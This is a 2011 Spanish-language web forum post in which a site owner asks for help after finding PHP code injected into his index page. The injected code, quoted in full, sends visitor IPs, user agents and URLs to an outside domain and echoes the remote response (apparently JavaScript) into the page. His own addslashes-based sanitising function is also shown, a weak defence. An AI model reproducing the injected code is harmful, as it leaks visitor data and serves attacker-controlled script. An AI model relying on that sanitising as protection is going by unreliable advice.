Ver Mensaje Individual
  #1 (permalink)  
Antiguo 02/09/2011, 02:13
jeixuxspn
 
Fecha de Ingreso: noviembre-2010
Ubicación: Munich - Alemania
Mensajes: 76
Antigüedad: 13 años, 5 meses
Puntos: 7
Seguridad contra hackeo

Hola a todos,

Desde hace unos dias vengo presentando problemas con la seguridad de mi web en php, pues a la hora de acceder el firewall me bloquea una dirección saliente, me he quedado un poco extrañado al desconocer de que se trataba, revisando el código del index, me he encontrado con que me habían añadido código php por arte de magia, el código es el siguiente:

<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
} else
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
}
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($stCurlHandle);
curl_close($stCurlHandle);
echo $sResult; // Statistic code end
?>

Lo que he visto es que ese código genera en la ejecución código javascript. He realizado las supuestas pruebas contra inyección y en teoría el servidor no tiene problemas, además he añadido en las primera lineas de código la siguiente función:

<?php
function addslashes__recursive($var){
if (!is_array($var))
return addslashes($var);
$new_var = array();
foreach ($var as $k => $v)$new_var[addslashes($k)]=addslashes__recursive($v);
return $new_var;
}
$_POST=addslashes__recursive($_POST);
$_GET=addslashes__recursive($_GET);
$_REQUEST=addslashes__recursive($_REQUEST);
$_SERVER=addslashes__recursive($_SERVER);
$_COOKIE=addslashes__recursive($_COOKIE);
?>

con todo y esto aún me siguen hackeando los archivos. He buscado información acerca de dicho ataque, pero no he encontrado mucha información al respecto. Alguien conoce alguna manera de protección? muchas gracias por la ayuda que me podáis dar.

Saludos,